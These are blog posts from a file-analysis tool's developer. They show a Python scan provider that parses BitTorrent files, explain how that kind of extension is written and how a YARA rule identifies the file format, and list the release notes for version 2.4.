href="https://blog.cerbero.io/yara-3-2-0-support/" rel="bookmark"><time class="entry-date published" datetime="2014-12-26T02:19:13+00:00">December 26, 2014</time><time class="updated" datetime="2021-04-01T16:35:26+00:00">April 1, 2021</time></a></span><span class="cat-links"><span class="screen-reader-text">Categories </span><a 
href="https://blog.cerbero.io/category/action/" rel="category tag">Action</a>, <a href="https://blog.cerbero.io/category/suite-standard/" rel="category tag">Suite Standard</a></span><span class="tags-links"><span class="screen-reader-text">Tags </span><a href="https://blog.cerbero.io/tag/signatures/" rel="tag">signatures</a>, <a href="https://blog.cerbero.io/tag/yara/" rel="tag">YARA</a></span><span class="comments-link"><a href="https://blog.cerbero.io/yara-3-2-0-support/#respond">Leave a comment<span class="screen-reader-text"> on YARA 3.2.0 support</span></a></span> </footer> </article> </s></b></hex><table id="1"></table></hl></ui>
class TorrentObject(CFFObject):

    # ...

    def GetTrackers(self):
        d = self.GetDictionary()
        trackers = []
        dup = set()
        if b"announce" in d and type(d[b"announce"]) is bytes:
            trackers.append(d[b"announce"])
            dup.add(trackers[0])
        if b"announce-list" in d:
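            al = d[b"announce-list"]
            # a malformed torrent may store any type here
            if type(al) is not list:
                al = []
            for a in al:
                # check the type before the set lookup: an unhashable a[0] would raise
                if type(a) is list and len(a) > 0 and type(a[0]) is bytes and a[0] not in dup:
                    trackers.append(a[0])
                    dup.add(a[0])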
        return trackers

def trackersViewCb(cv, trackers, code, view, data):
    if code == pvnInit:
        tv = cv.getView(1)
        tv.setColumnCount(1)
        labels = NTStringList()
        labels.append("Tracker")
        tv.setColumnLabels(labels)
        tv.setColumnCWidth(0, 70)
        tv.setRowCount(len(trackers))
        return 1
    elif code == pvnGetTableRow:
        if view.id() == 1:
            data.setText(0, trackers[data.row].decode("utf-8", errors="ignore"))
    return 0

class TorrentScanProvider(ScanProvider):

    # ...

    def _formatViewData(self, sdata):
        # ...
        elif sdata.fid == self.FormatItem_Trackers:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("<ui><hl margin='0'><table id='1'/></hl></ui>")
            sdata.setCallback(trackersViewCb, self.obj.GetTrackers())
            return True
        return False

Trackers

When retrieving data from the dictionary, we also make sure that it is of the correct type, so that the code which handles this data won't raise an exception when it encounters an unexpected type.
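
The same defensive pattern can be factored into a small helper. The following is a minimal sketch and not part of the extension itself: get_typed is a hypothetical name, and the sample dictionary merely mimics what a bencode decoder could return for a malformed torrent.

```python
def get_typed(d, key, expected, default=None):
    """Return d[key] only if d is a dict and the value has exactly the expected type."""
    if type(d) is not dict:
        return default
    value = d.get(key, default)
    return value if type(value) is expected else default

# Hypothetical decoded torrent: "announce" holds an int instead of bytes.
decoded = {b"announce": 42, b"comment": b"hello"}

announce = get_typed(decoded, b"announce", bytes, b"")  # wrong type, falls back to the default
comment = get_typed(decoded, b"comment", bytes, b"")    # correct type, returned as-is
print(announce, comment)
```

The exact type comparison mirrors the checks used in GetTrackers: a value of an unexpected type is treated as if it were missing.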

And now the files:

class TorrentObject(CFFObject):

    # ...

    def GetFiles(self):
        d = self.GetDictionary()
        if not b"info" in d:
            return []
        d = d[b"info"]
        if not type(d) is dict:
            return []
        files = []
        if not b"files" in d: 
            if b"name" in d and type(d[b"name"]) is bytes:
                sz = d.get(b"length", 0)
                files.append((d[b"name"], sz if type(sz) is int else 0))
        else:
            flist = d[b"files"]
            if not type(flist) is list:
                return []
            for fd in flist:
                if type(fd) is dict:
                    if b"path" in fd:
                        pt = fd[b"path"]
                        if type(pt) is list and len(pt) > 0 and type(pt[0]) is bytes:
                            sz = fd.get(b"length", 0)
                            files.append((pt[0], sz if type(sz) is int else 0))
        return files

def filesViewCb(cv, files, code, view, data):
    if code == pvnInit:
        tv = cv.getView(1)
        tv.setColumnCount(2)
        labels = NTStringList()
        labels.append("Name")
        labels.append("Size")
        tv.setColumnLabels(labels)
        tv.setColumnCWidth(0, 70)
        tv.setColumnCWidth(1, 35)
        tv.setRowCount(len(files))
        return 1
    elif code == pvnGetTableRow:
        if view.id() == 1:
            data.setText(0, files[data.row][0].decode("utf-8", errors="ignore"))
            sz = files[data.row][1]
            data.setText(1, "%.02f MBs (%d bytes)" % (sz / 0x100000, sz))
    return 0

class TorrentScanProvider(ScanProvider):

    # ...

    def _formatViewData(self, sdata):
        # ...
        elif sdata.fid == self.FormatItem_Files:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("<ui><hl margin='0'><table id='1'/></hl></ui>")
            sdata.setCallback(filesViewCb, self.obj.GetFiles())
            return True
        return False

Files

And that's it. Now again the whole code for a better overview:

from Pro.Core import *
from Pro.UI import pvnInit, pvnGetTableRow
import pprint

MAX_TORRENT_SIZE = 10485760 # 10 MBs

#
# BEGIN OF 3RD PARTY CODE (adapted to work with Python 3)
#
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License).  You may not copy or use this file, in either
# source code or executable form, except in compliance with the License.  You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied.  See the License
# for the specific language governing rights and limitations under the
# License.

# Written by Petru Paler

def decode_int(x, f):
    f += 1
    newf = x.index(0x65, f)
    n = int(x[f:newf])
    if x[f] == 0x2D: # -
        if x[f + 1] == 0x30:
            raise ValueError
    elif x[f] == 0x30 and newf != f+1:
        raise ValueError
    return (n, newf+1)

def decode_string(x, f):
    colon = x.index(0x3A, f) # :
    n = int(x[f:colon])
    if x[f] == 0x30 and colon != f+1:
        raise ValueError
    colon += 1
    return (x[colon:colon+n], colon+n)

def decode_list(x, f):
    r, f = [], f+1
    while x[f] != 0x65: # e
        v, f = decode_func[x[f]](x, f)
        r.append(v)
    return (r, f + 1)

def decode_dict(x, f):
    r, f = {}, f+1
    while x[f] != 0x65: # e
        k, f = decode_string(x, f)
        r[k], f = decode_func[x[f]](x, f)
    return (r, f + 1)

decode_func = {}
decode_func[0x6C] = decode_list # l
decode_func[0x64] = decode_dict # d
decode_func[0x69] = decode_int  # i
decode_func[0x30] = decode_string
decode_func[0x31] = decode_string
decode_func[0x32] = decode_string
decode_func[0x33] = decode_string
decode_func[0x34] = decode_string
decode_func[0x35] = decode_string
decode_func[0x36] = decode_string
decode_func[0x37] = decode_string
decode_func[0x38] = decode_string
decode_func[0x39] = decode_string

def bdecode(x):
    try:
        r, l = decode_func[x[0]](x, 0)
    except (IndexError, KeyError, ValueError):
        return {}
    if l != len(x):
        return {}
    return r
    
#
# END OF 3RD PARTY CODE
#

class TorrentObject(CFFObject):

    def __init__(self):
        super(TorrentObject, self).__init__()
        self.SetObjectFormatName("TORRENT")
        self.SetDefaultEndianness(ENDIANNESS_LITTLE)
        self.tdict = None
        
    def GetDictionary(self):
        if self.tdict == None:
            size = min(self.GetSize(), MAX_TORRENT_SIZE)
            data = self.Read(0, size)
            self.tdict = bdecode(bytes(data))
        return self.tdict
        
    def CreationDate(self):
        d = self.GetDictionary()
        cd = d.get(b"creation date", None)
        if cd == None or not type(cd) is int:
            return NTDateTime()
        return NTDateTime.fromMSecsSinceEpoch(cd * 1000)
        
    def GetTrackers(self):
        d = self.GetDictionary()
        trackers = []
        dup = set()
        if b"announce" in d and type(d[b"announce"]) is bytes:
            trackers.append(d[b"announce"])
            dup.add(trackers[0])
        if b"announce-list" in d:
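            al = d[b"announce-list"]
            # a malformed torrent may store any type here
            if type(al) is not list:
                al = []
            for a in al:
                # check the type before the set lookup: an unhashable a[0] would raise
                if type(a) is list and len(a) > 0 and type(a[0]) is bytes and a[0] not in dup:
                    trackers.append(a[0])
                    dup.add(a[0])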
        return trackers
        
    def GetFiles(self):
        d = self.GetDictionary()
        if not b"info" in d:
            return []
        d = d[b"info"]
        if not type(d) is dict:
            return []
        files = []
        if not b"files" in d: 
            if b"name" in d and type(d[b"name"]) is bytes:
                sz = d.get(b"length", 0)
                files.append((d[b"name"], sz if type(sz) is int else 0))
        else:
            flist = d[b"files"]
            if not type(flist) is list:
                return []
            for fd in flist:
                if type(fd) is dict:
                    if b"path" in fd:
                        pt = fd[b"path"]
                        if type(pt) is list and len(pt) > 0 and type(pt[0]) is bytes:
                            sz = fd.get(b"length", 0)
                            files.append((pt[0], sz if type(sz) is int else 0))
        return files

def trackersViewCb(cv, trackers, code, view, data):
    if code == pvnInit:
        tv = cv.getView(1)
        tv.setColumnCount(1)
        labels = NTStringList()
        labels.append("Tracker")
        tv.setColumnLabels(labels)
        tv.setColumnCWidth(0, 70)
        tv.setRowCount(len(trackers))
        return 1
    elif code == pvnGetTableRow:
        if view.id() == 1:
            data.setText(0, trackers[data.row].decode("utf-8", errors="ignore"))
    return 0
    
def filesViewCb(cv, files, code, view, data):
    if code == pvnInit:
        tv = cv.getView(1)
        tv.setColumnCount(2)
        labels = NTStringList()
        labels.append("Name")
        labels.append("Size")
        tv.setColumnLabels(labels)
        tv.setColumnCWidth(0, 70)
        tv.setColumnCWidth(1, 35)
        tv.setRowCount(len(files))
        return 1
    elif code == pvnGetTableRow:
        if view.id() == 1:
            data.setText(0, files[data.row][0].decode("utf-8", errors="ignore"))
            sz = files[data.row][1]
            data.setText(1, "%.02f MBs (%d bytes)" % (sz / 0x100000, sz))
    return 0

class TorrentScanProvider(ScanProvider):

    def __init__(self):
        super(TorrentScanProvider, self).__init__()
        self.obj = None
        self.meta_keys = [b"created by", b"creation date", b"comment"]
        
        # format item IDs
        self.FormatItem_Dictionary = 1
        self.FormatItem_Trackers = 2
        self.FormatItem_Files = 3
        # format item names
        self.fi_names = ["Dictionary", "Trackers", "Files"]

    def _clear(self):
        self.obj = None

    def _getObject(self):
        return self.obj

    def _initObject(self):
        self.obj = TorrentObject()
        self.obj.Load(self.getStream())
        d = self.obj.GetDictionary()
        return self.SCAN_RESULT_OK if len(d) != 0 else self.SCAN_RESULT_ERROR

    def _startScan(self):
        d = self.obj.GetDictionary()
        if any(mk in d for mk in self.meta_keys):
            e = ScanEntryData()
            e.category = SEC_Privacy
            e.type = CT_MetaData
            self.addEntry(e)
        if self.obj.GetSize() > MAX_TORRENT_SIZE:
            e = ScanEntryData()
            e.category = SEC_Warn
            e.type = CT_UnaccountedSpace
            self.addEntry(e)
        return self.SCAN_RESULT_FINISHED

    def _scanViewData(self, xml, dnode, sdata):
        if sdata.type == CT_MetaData:
            d = self.obj.GetDictionary()
            out = proTextStream()
            for mk in self.meta_keys:
                if mk in d:
                    tmk = mk.decode("utf-8", errors="ignore")
                    if tmk == "creation date":
                        dt = self.obj.CreationDate()
                        tmv = dt.toString() if dt.isValid() else "?"
                    else:
                        tmv = d[mk].decode("utf-8", errors="ignore")
                    out._print(tmk)
                    out._print(": ")
                    out._print(tmv)
                    out.nl()
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData(out.buffer)
            return True
        elif sdata.type == CT_UnaccountedSpace:
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData("The file size exceeds the maximum allowed one of %d bytes!" % (MAX_TORRENT_SIZE,))
            return True
        return False
        
    def _getFormat(self):
        ft = FormatTree()
        ft.enableIDs(True)
        fi = ft.appendChild(None, self.FormatItem_Dictionary)
        ft.appendChild(fi, self.FormatItem_Trackers)
        ft.appendChild(fi, self.FormatItem_Files)
        return ft
        
    def _formatViewInfo(self, finfo):
        # both bounds must hold, otherwise an out-of-range id would index fi_names
        if finfo.fid >= 1 and finfo.fid - 1 < len(self.fi_names):
            finfo.text = self.fi_names[finfo.fid - 1]
            return True
        return False
        
    def _formatViewData(self, sdata):
        if sdata.fid == self.FormatItem_Dictionary:
            sdata.setViews(SCANVIEW_TEXT)
            txt = pprint.pformat(self.obj.GetDictionary())
            sdata.data.setData(txt)
            return True
        elif sdata.fid == self.FormatItem_Trackers:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("<ui><hl margin='0'><table id='1'/></hl></ui>")
            sdata.setCallback(trackersViewCb, self.obj.GetTrackers())
            return True
        elif sdata.fid == self.FormatItem_Files:
            sdata.setViews(SCANVIEW_CUSTOM)
            sdata.data.setData("<ui><hl margin='0'><table id='1'/></hl></ui>")
            sdata.setCallback(filesViewCb, self.obj.GetFiles())
            return True
        return False

def torrentAllocator():
    return TorrentScanProvider()
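
To try the provider on controlled input, it helps to be able to build small torrent files by hand. The following is a minimal sketch of a bencode encoder written purely for illustration: bencode and the sample dictionary are assumptions and not part of the extension. It covers only the four types the decoder above produces (int, bytes, list and dict).

```python
def bencode(value):
    """Encode ints, bytes, lists and dicts (with bytes keys) as bencoded bytes."""
    if type(value) is int:
        return b"i" + str(value).encode("ascii") + b"e"
    if type(value) is bytes:
        return str(len(value)).encode("ascii") + b":" + value
    if type(value) is list:
        return b"l" + b"".join(bencode(v) for v in value) + b"e"
    if type(value) is dict:
        out = [b"d"]
        # keys are emitted in sorted order, as the bencode format requires
        for k in sorted(value):
            if type(k) is not bytes:
                raise TypeError("dictionary keys must be bytes")
            out.append(bencode(k))
            out.append(bencode(value[k]))
        out.append(b"e")
        return b"".join(out)
    raise TypeError("unsupported type: %r" % type(value))

# Hypothetical single-file torrent; the tracker URL is a placeholder.
sample = {
    b"announce": b"http://tracker.example/announce",
    b"info": {b"name": b"file.bin", b"length": 1024},
}
encoded = bencode(sample)
print(encoded)
```

Writing the resulting bytes to a file with a .torrent extension gives a test case whose expected Trackers and Files views are known in advance. Replacing a value with one of an unexpected type is an easy way to exercise the type checks.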

We could still extract more information from the torrent file. For instance, we could show the list of hashes and the portion of each file they belong to. If that's interesting for forensic purposes, we can easily add this view in the future.
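
As a rough illustration of that idea, the mapping between hashes and files can be derived from the "piece length" and "pieces" keys of the info dictionary together with the file lengths. This is a minimal sketch under stated assumptions: map_pieces_to_files is a hypothetical helper, it takes (name, size) tuples in the form returned by GetFiles, and it assumes a well-formed torrent in which "pieces" is a concatenation of 20-byte SHA-1 digests.

```python
def map_pieces_to_files(files, piece_length, pieces):
    """Return a list of (piece_index, sha1_hex, [(file_name, offset_in_file, size)])."""
    if piece_length <= 0:
        return []
    # absolute start and end offset of every file in the concatenated payload
    spans = []
    pos = 0
    for name, size in files:
        spans.append((name, pos, pos + size))
        pos += size
    total = pos
    result = []
    for i in range(len(pieces) // 20):
        start = i * piece_length
        end = min(start + piece_length, total)
        parts = []
        for name, fstart, fend in spans:
            # intersection between the piece and the file
            lo, hi = max(start, fstart), min(end, fend)
            if lo < hi:
                parts.append((name, lo - fstart, hi - lo))
        result.append((i, pieces[i * 20:(i + 1) * 20].hex(), parts))
    return result

# Made-up example: two files of 5 and 7 bytes, 4-byte pieces, dummy all-zero hashes.
files = [(b"a.bin", 5), (b"b.bin", 7)]
mapping = map_pieces_to_files(files, 4, bytes(60))
for index, digest, parts in mapping:
    print(index, digest, parts)
```

A piece that straddles a file boundary is reported with one entry per file, which is the information such a view would need to display.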

Scan Providers

Version 2.5.0 is close to being released and comes with the last type of extension exposed to Python: scan providers. Scan provider extensions are not only the most complex type of extension, but also the most powerful, as they make it possible to add support for new file formats entirely from Python!

This feature required exposing a lot more of the SDK to Python and can’t be completely discussed in one post. This post is going to introduce the topic, while future posts will show real life examples.

Let’s start from the list of Python scan providers under Extensions -> Scan providers:

Scan provider extensions

This list is retrieved from the configuration file ‘scanp.cfg’. Here’s an example entry:

[TEST]
label = Test scan provider
ext = test2,test3
group = db
file = Test.py
allocator = allocator

The name of the section has two purposes: it specifies the name of the format being supported (in this case ‘TEST’) and also the name of the extension which is automatically associated with that format (in this case ‘.test’, case insensitive). The hard limit for format names is 9 characters for now; this may change in the future if more are needed. The label is the description. The ext parameter is optional and specifies additional extensions to be associated with the format. group specifies the type of file being supported; available groups are: img, video, audio, doc, font, exe, manexe, arch, db, sys, cert, script. file specifies the Python source file and allocator the function which returns a new instance of the scan provider class.
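
To make the rules above more concrete, here's a small standalone sketch that checks an entry like the one shown. It uses Python's standard configparser rather than anything from the SDK, and the checks (the 9 character limit, the list of groups, treating every key except ext as required) are only my reading of the description above, not the actual loader. The names check_entries and SAMPLE are made up for the example.

```python
import configparser

# Groups and name limit as listed in the text above.
KNOWN_GROUPS = {"img", "video", "audio", "doc", "font", "exe", "manexe",
                "arch", "db", "sys", "cert", "script"}
MAX_FORMAT_NAME = 9

SAMPLE = """
[TEST]
label = Test scan provider
ext = test2,test3
group = db
file = Test.py
allocator = allocator
"""

def check_entries(text):
    """Return {format name: [associated extensions]} or raise ValueError."""
    cfg = configparser.ConfigParser()
    cfg.read_string(text)
    result = {}
    for name in cfg.sections():
        sec = cfg[name]
        if len(name) > MAX_FORMAT_NAME:
            raise ValueError("format name too long: " + name)
        # assumption: everything except 'ext' is required
        for key in ("label", "group", "file", "allocator"):
            if key not in sec:
                raise ValueError("missing '%s' in section %s" % (key, name))
        if sec["group"] not in KNOWN_GROUPS:
            raise ValueError("unknown group in section " + name)
        # the section name doubles as the default extension (case insensitive)
        exts = [name.lower()]
        extra = sec.get("ext", "")
        exts += [e.strip().lower() for e in extra.split(",") if e.strip()]
        result[name] = exts
    return result

print(check_entries(SAMPLE))
```

The returned dictionary maps each format name to the extensions that would end up associated with it, the implicit one included.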

Let’s start with the allocator:

def allocator():
    return TestScanProvider()

It just returns a new instance of TestScanProvider, which is a class derived from ScanProvider:

class TestScanProvider(ScanProvider):

    def __init__(self):
        super(TestScanProvider, self).__init__()
        self.obj = None

Every scan provider has some mandatory methods it must override. Let’s begin with the first ones:

    def _clear(self):
        self.obj = None

    def _getObject(self):
        return self.obj

    def _initObject(self):
        self.obj = TestObject()
        self.obj.Load(self.getStream())
        return self.SCAN_RESULT_OK

_clear gives a chance to free internal resources when they’re no longer used. In Python this is not usually important as member objects will automatically be freed when their reference count reaches zero.

_getObject must return the internal instance of the object being parsed. This must return an instance of a CFFObject derived class.

_initObject creates the object instance and loads the data stream into it. In the sample above we assume that this succeeds. Otherwise, we would have to return SCAN_RESULT_ERROR. This method is not called by the main thread, so that it doesn’t block the UI during long parse operations.

Let’s take a look at the TestObject class:

class TestObject(CFFObject):

    def __init__(self):
        super(TestObject, self).__init__()
        self.SetObjectFormatName("TEST")
        self.SetDefaultEndianness(ENDIANNESS_LITTLE)

This is a minimalistic implementation of a CFFObject derived class. Usually it should contain at least an override of the CustomLoad method, which gives the object a chance to fail when the data stream is first loaded through the Load method. SetDefaultEndianness isn’t even necessary here, as every object defaults to little endian. SetObjectFormatName, on the other hand, is very important, as it sets the internal format name of the object.
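
As a rough illustration of the CustomLoad idea, here is a sketch which runs outside of Profiler. The CFFObject class below is only a stand-in written for this example: the assumptions that CustomLoad receives the stream, returns a boolean and that Load reports that result are mine, and plain bytes are used in place of a real data stream. The result constants are placeholders as well.

```python
# Stand-in for Pro.Core.CFFObject, so that the sketch runs on its own.
class CFFObject(object):

    def __init__(self):
        self.data = None

    def Load(self, stream):
        # assumed behaviour: Load gives CustomLoad a chance to reject the data
        if not self.CustomLoad(stream):
            return False
        self.data = stream
        return True

    def CustomLoad(self, stream):
        return True

class TestObject(CFFObject):

    SIGNATURE = b"test"

    def CustomLoad(self, stream):
        # fail early when the data doesn't start with our signature
        return stream[:len(self.SIGNATURE)] == self.SIGNATURE

# placeholder values, not the real SDK constants
SCAN_RESULT_OK, SCAN_RESULT_ERROR = 0, 1

def init_object(stream):
    """What _initObject could do once Load is allowed to fail."""
    obj = TestObject()
    if not obj.Load(stream):
        return None, SCAN_RESULT_ERROR
    return obj, SCAN_RESULT_OK

print(init_object(b"test1234")[1], init_object(b"nope")[1])
```

With a check like this in place, the scan provider no longer has to assume that loading always succeeds.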

Let’s now take a look at how we scan a file:

    def _startScan(self):
        return self.SCAN_RESULT_OK
        
    def _threadScan(self):
        e = ScanEntryData()
        e.category = SEC_Warn
        e.type = CT_NativeCode
        self.addEntry(e)

The code above will issue a single warning concerning native code. _startScan is called from the main thread. When it returns SCAN_RESULT_OK, _threadScan is then called from a thread other than the main UI one. If the scan of the file doesn’t require complex operations, as in the case above, _startScan could do the work itself and return SCAN_RESULT_FINISHED, in which case _threadScan won’t be called at all. During a threaded scan, an abort by the user can be detected via the isAborted method.
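
The interplay between the two methods can be modelled with a few lines of plain Python. This is only a toy model of the behaviour described above, not how Profiler implements it: ToyProvider, run_scan and the constant values are invented for the example, and only the method names _startScan, _threadScan and isAborted come from the SDK.

```python
import threading

# placeholder values, not the real SDK constants
SCAN_RESULT_OK = "ok"
SCAN_RESULT_FINISHED = "finished"

class ToyProvider(object):

    def __init__(self, quick):
        self.quick = quick
        self.entries = []
        self._abort = threading.Event()

    def abort(self):
        self._abort.set()

    def isAborted(self):
        return self._abort.is_set()

    def _startScan(self):
        if self.quick:
            # cheap scan: do everything here, no worker thread needed
            self.entries.append("found in _startScan")
            return SCAN_RESULT_FINISHED
        return SCAN_RESULT_OK

    def _threadScan(self):
        for i in range(1000):
            if self.isAborted():
                return  # the user cancelled the scan
            self.entries.append("chunk %d" % i)

def run_scan(provider):
    """Model of the host side: returns True if a worker thread was used."""
    if provider._startScan() == SCAN_RESULT_FINISHED:
        return False
    worker = threading.Thread(target=provider._threadScan)
    worker.start()
    worker.join()
    return True

print(run_scan(ToyProvider(quick=True)), run_scan(ToyProvider(quick=False)))
```

Checking isAborted inside the loop is what keeps a long threaded scan responsive to the user.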

From the UI point of view, when a scan entry is clicked in the summary, the scan provider is supposed to return UI information.

    def _scanViewData(self, xml, dnode, sdata):
        if sdata.type == CT_NativeCode:
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData("Hello, world!")
            return True
        return False

This will display a text field with predefined content when the user clicks the scan entry in the summary. This is fairly easy, but what happens when we have several entries of the same type and need to differentiate between them? That’s where the data member of ScanEntryData plays a role: it is a string which will be included in the report XML and passed back to _scanViewData as an XML node.

For instance:

e.data = "<o>1234</o>"

Becomes this in the final XML report:

<d>
    <o>1234</o>
</d>

The dnode argument of _scanViewData points to the ‘d’ node and its first child will be the ‘o’ node we passed. The xml argument is an instance of the NTXml class, which can be used to retrieve the children of dnode.
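
The round trip of the data string can be illustrated with Python's standard ElementTree module. Keep in mind that this is just an analogy: inside a scan provider the node is accessed through NTXml, whose methods aren't shown in this post, and the helper names below are invented for the example.

```python
import xml.etree.ElementTree as ET

def wrap_entry_data(data):
    """Mimic how the string assigned to e.data ends up under a 'd' node."""
    return ET.fromstring("<d>" + data + "</d>")

def first_child(dnode):
    """Return (tag, text) of the first child of dnode, or None if it has none."""
    children = list(dnode)
    if not children:
        return None
    return children[0].tag, children[0].text

dnode = wrap_entry_data("<o>1234</o>")
print(first_child(dnode))
```

The value stored in the ‘o’ node is what allows _scanViewData to tell apart several entries of the same type, for instance by using it as an offset or an index.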

But this is only half of the story: some of the scan entries may represent embedded files (category SEC_File), in which case the _scanViewData method must return the data representing the file.

Apart from scan entries, we may also want the user to explore the format of the file. To do that we must return a tree representing the structure of our file:

    def _getFormat(self):
        ft = FormatTree()
        ft.enableIDs(True)
        fi = ft.appendChild(None, 1)
        ft.appendChild(fi, 2)
        return ft

The enableIDs method must be called right after creating a new FormatTree instance. The code above creates a format item with id 1 and a child item with id 2, which results in the following:

Format tree

But of course, we haven’t specified labels or icons in the function above. This information is retrieved for each item when required through the following method:

    def _formatViewInfo(self, finfo):
        if finfo.fid == 1:
            finfo.text = "directory"
            finfo.icon = PubIcon_Dir
            return True
        elif finfo.fid == 2:
            finfo.text = "entry"
            return True
        return False

The various items are identified by their id, which was specified during the creation of the tree.
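
When the number of items grows, the if/elif chain can be replaced by a lookup table keyed by id. The following is a standalone sketch of that idea: FormatInfo is a stand-in for the finfo argument with just the fields used here, and the icon is a plain string instead of a PubIcon_* value, so that the code runs outside of Profiler.

```python
class FormatInfo(object):
    """Stand-in for the finfo argument: only the fields used in this sketch."""

    def __init__(self, fid):
        self.fid = fid
        self.text = None
        self.icon = None

# id -> (label, icon); None means "keep the default icon"
FORMAT_ITEMS = {
    1: ("directory", "dir-icon"),
    2: ("entry", None),
}

def format_view_info(finfo):
    item = FORMAT_ITEMS.get(finfo.fid)
    if item is None:
        return False  # unknown id: nothing to display
    text, icon = item
    finfo.text = text
    if icon is not None:
        finfo.icon = icon
    return True

fi = FormatInfo(1)
print(format_view_info(fi), fi.text, fi.icon)
```

A dictionary lookup also rejects unknown ids without any explicit range check.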

The UI data for each item is retrieved through the _formatViewData method:

    def _formatViewData(self, sdata):
        if sdata.fid == 1:
            sdata.setViews(SCANVIEW_CUSTOM)
            # horizontal splitter layout; its child views (a table and a hex view) are omitted here
            sdata.data.setData('<ui><hsplitter csizes="40-*"></hsplitter></ui>')
            sdata.setCallback(cb, None)
            return True
        return False

This will display a custom view with a table and a hex view separated by a splitter:

Custom view

Of course, we also have to specify the callback for our custom view:

def cb(cv, ud, code, view, data):
    if code == pvnInit:
        return 1
    return 0

It is good to remember that format item IDs and IDs used in custom views are used to encode bookmark jumps. So if they change, saved bookmark jumps become invalid.

And here again the whole code for a better overview:

from Pro.Core import *
from Pro.UI import pvnInit, PubIcon_Dir

class TestObject(CFFObject):

    def __init__(self):
        super(TestObject, self).__init__()
        self.SetObjectFormatName("TEST")
        self.SetDefaultEndianness(ENDIANNESS_LITTLE)

def cb(cv, ud, code, view, data):
    if code == pvnInit:
        return 1
    return 0

class TestScanProvider(ScanProvider):

    def __init__(self):
        super(TestScanProvider, self).__init__()
        self.obj = None

    def _clear(self):
        self.obj = None

    def _getObject(self):
        return self.obj

    def _initObject(self):
        self.obj = TestObject()
        self.obj.Load(self.getStream())
        return self.SCAN_RESULT_OK

    def _startScan(self):
        return self.SCAN_RESULT_OK
        
    def _threadScan(self):
        print("thread msg")
        e = ScanEntryData()
        e.category = SEC_Warn
        e.type = CT_NativeCode
        self.addEntry(e)

    def _scanViewData(self, xml, dnode, sdata):
        if sdata.type == CT_NativeCode:
            sdata.setViews(SCANVIEW_TEXT)
            sdata.data.setData("Hello, world!")
            return True
        return False
        
    def _getFormat(self):
        ft = FormatTree()
        ft.enableIDs(True)
        fi = ft.appendChild(None, 1)
        ft.appendChild(fi, 2)
        return ft
        
    def _formatViewInfo(self, finfo):
        if finfo.fid == 1:
            finfo.text = "directory"
            finfo.icon = PubIcon_Dir
            return True
        elif finfo.fid == 2:
            finfo.text = "entry"
            return True
        return False
        
    def _formatViewData(self, sdata):
        if sdata.fid == 1:
            sdata.setViews(SCANVIEW_CUSTOM)
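            # horizontal splitter layout; its child views (a table and a hex view) are omitted here
            sdata.data.setData('<ui><hsplitter csizes="40-*"></hsplitter></ui>')
            sdata.setCallback(cb, None)
            return True
        return False

def allocator():
    return TestScanProvider()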

As you may have noticed from the screen-shot above, the analysed file is called ‘a.t’ and as such isn’t automatically associated with our ‘test’ format. So how is it associated anyway?

Clearly Profiler doesn’t rely on extensions alone to identify the format of a file. For external scan providers a signature mechanism based on YARA has been introduced. In the config directory of the user, you can create a file named ‘yara.plain’ and insert your identification rules in it, e.g.:

rule test
{
    strings:
        $sig = "test"

    condition:
        $sig at 0
}

This rule will identify the format as ‘test’ if the first 4 bytes of the file match the string ‘test’: the name of the rule identifies the format.

The file ‘yara.plain’ will be compiled to the binary ‘yara.rules’ file at the first run. In order to refresh ‘yara.rules’, you must delete it.

One important thing to remember is that a rule isn’t matched against an entire file, but only against the first 512 bytes.
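
The practical consequence of the 512 byte window can be shown without YARA at all. The sketch below emulates the two most common kinds of condition for a plain byte signature. It is only a model of the limitation described above, and the function names are invented for the example.

```python
SCAN_WINDOW = 512  # only the leading bytes of the file are matched

def matches_at_zero(data, sig=b"test"):
    """Rough equivalent of the condition '$sig at 0'."""
    return data[:SCAN_WINDOW].startswith(sig)

def matches_anywhere(data, sig=b"test"):
    """Rough equivalent of the condition '$sig', limited to the window."""
    return sig in data[:SCAN_WINDOW]

header = b"test" + b"\x00" * 16
late = b"x" * 600 + b"test"

print(matches_at_zero(header), matches_anywhere(late))
```

A signature which only shows up after the first 512 bytes, like in the second buffer, will never identify the format, so identification rules should rely on header data.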

Of course, our provider behaves 100% like all other providers and can be used to load embedded files:

Embedded files

Our new provider is used automatically when an embedded file is identified as matching our format.

Profiler 2.4

Profiler 2.4 is out with the following news:

– added initial support for PDB files (including export of types)
– added support for Windows Encoded Scripts (VBE, JSE)
– introduced fixed xml structures
– added automatic string decoding in struct tables
– added Python string command line execution
– remember the last selected logic group
– fixed missing support for wchar_t in C types
– updated Qt to 5.4.1
– various bug fixes

While the most important newly introduced feature is the support for PDB files, here are some interesting new features:

Support for Windows Encoded Scripts (VBE, JSE)

Windows encoded scripts like VBE and JSE files (the encoded variants of VBS and JS script files) are now supported and automatically decoded.

In the screen-shot you can see the decoded output of an encoded file (shown at the bottom).

Automatic string decoding in struct tables

A very basic feature: byte-arrays in structures are automatically checked for strings and, when one is found, decoded.

(notice the section name automatically displayed as ascii string)
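
To give an idea of what such a check may look like, here is a minimal sketch in plain Python. The heuristic (printable ASCII followed only by NUL padding) is an assumption made for the example and not necessarily the one used by Profiler.

```python
def decode_if_string(raw, min_len=2):
    """Return the ASCII string stored in raw, or None if it doesn't look like one."""
    text = raw.split(b"\x00", 1)[0]  # characters up to the first NUL
    padding = raw[len(text):]
    if len(text) < min_len:
        return None
    if any(b != 0 for b in padding):  # only NUL bytes may follow the string
        return None
    if not all(0x20 <= b <= 0x7E for b in text):  # printable ASCII only
        return None
    return text.decode("ascii")

# an 8 byte section name field, as found in a PE section header
print(decode_if_string(b".text\x00\x00\x00"))
```

Arrays which contain binary data simply yield None and would be displayed as raw bytes.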

Python string command line execution

Apart from executing script files passed as command line arguments, now it is also possible to execute Python statements directly passed as argument.

For instance:

cerpro -c -e "from Pro.Core import *;proCoreContext().msgBox(0, \"Hello world!\")"

The optional ‘-c’ argument tells Profiler not to display the UI.

Enjoy!

PDB support (including export of types)

